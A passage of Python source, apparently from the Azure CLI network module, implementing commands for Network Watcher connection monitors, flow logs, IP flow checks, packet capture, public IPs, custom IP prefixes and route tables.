ConnectionMonitorEndpointScope, ConnectionMonitorEndpointScopeItem) = cmd.get_models(
'ConnectionMonitorEndpoint', 'ConnectionMonitorEndpointFilter',
'ConnectionMonitorEndpointScope', 'ConnectionMonitorEndpointScopeItem')
endpoint_scope = ConnectionMonitorEndpointScope(include=[], exclude=[])
for ip in address_include or []:
include_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.include.append(include_item)
for ip in address_exclude or []:
exclude_item = ConnectionMonitorEndpointScopeItem(address=ip)
endpoint_scope.exclude.append(exclude_item)
endpoint = ConnectionMonitorEndpoint(name=name,
resource_id=endpoint_resource_id,
address=address,
type=endpoint_type,
coverage_level=coverage_level,
scope=endpoint_scope if address_include or address_exclude else None)
if filter_type and filter_items:
endpoint_filter = ConnectionMonitorEndpointFilter(type=filter_type, items=filter_items)
endpoint.filter = endpoint_filter
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.endpoints.append(endpoint)
src_test_groups, dst_test_groups = set(source_test_groups or []), set(dest_test_groups or [])
for test_group in connection_monitor.test_groups:
if test_group.name in src_test_groups:
test_group.sources.append(endpoint.name)
if test_group.name in dst_test_groups:
test_group.destinations.append(endpoint.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh endpoints
new_endpoints = [endpoint for endpoint in connection_monitor.endpoints if endpoint.name != name]
connection_monitor.endpoints = new_endpoints
# refresh test groups
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
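    """Add a test group to an existing V2 connection monitor.

    New source/destination endpoints and a new test configuration are created and
    appended to the monitor only when the corresponding endpoint or test-config
    arguments are provided; otherwise the given names are assumed to reference
    entities that already exist on the monitor.
    """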
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
        # Pass the trailing optional arguments by keyword so they stay aligned with the
        # helper's signature (which also accepts tcp_port_behavior between tcp_port and
        # tcp_disable_trace_route).
        test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
                                                                          test_config_name,
                                                                          test_config_frequency,
                                                                          test_config_protocol,
                                                                          test_config_threshold_failed_percent,
                                                                          test_config_threshold_round_trip_time,
                                                                          test_config_preferred_ip_version,
                                                                          tcp_port=test_config_tcp_port,
                                                                          tcp_disable_trace_route=test_config_tcp_disable_trace_route,
                                                                          icmp_disable_trace_route=test_config_icmp_disable_trace_route,
                                                                          http_port=test_config_http_port,
                                                                          http_method=test_config_http_method,
                                                                          http_path=test_config_http_path,
                                                                          http_valid_status_codes=test_config_http_valid_status_codes,
                                                                          http_prefer_https=test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
        raise CLIError('test group "{}" does not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
    # deal with test configurations that are only referenced by the removed test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
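    """Run Network Watcher IP flow verify against a VM NIC.

    The local and remote arguments take 'x.x.x.x:port' pairs, and bare VM/NIC names
    are expanded to full resource ids using resource_group_name. Illustrative CLI
    invocation (values are placeholders):

        az network watcher test-ip-flow --vm MyVm -g MyGroup --direction Inbound --protocol TCP --local 10.0.0.4:22 --remote 203.0.113.5:55000
    """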
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
    try:
        local_ip_address, local_port = local.split(':')
        remote_ip_address, remote_port = remote.split(':')
    except ValueError:
        raise CLIError("usage error: the format of '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
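    # If traffic analytics was never configured, the nested attribute access below raises
    # AttributeError; normalize that case to "no analytics configuration".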
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# the combination of resource_group_name and nsg targets the legacy (NSG-scoped) flow log output
# the combination of location and flow_log_name targets the newer flow log resource
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
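    # Only attach a retention policy when a positive number of retention days is requested.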
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
                       resource_group_name=None,  # unused; kept so the argument still appears in the command signature
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
            # look up the parent prefix (assumed to be a name in the same resource group)
            prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_parent)
        except ResourceNotFoundError:
            raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_parent))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
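        # Convert the CLI value to the state name the service expects, e.g. 'commission' -> 'Commissioning'.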
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
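    # Standard SKU public IPs only support static allocation, so default accordingly; otherwise default to dynamic.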
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
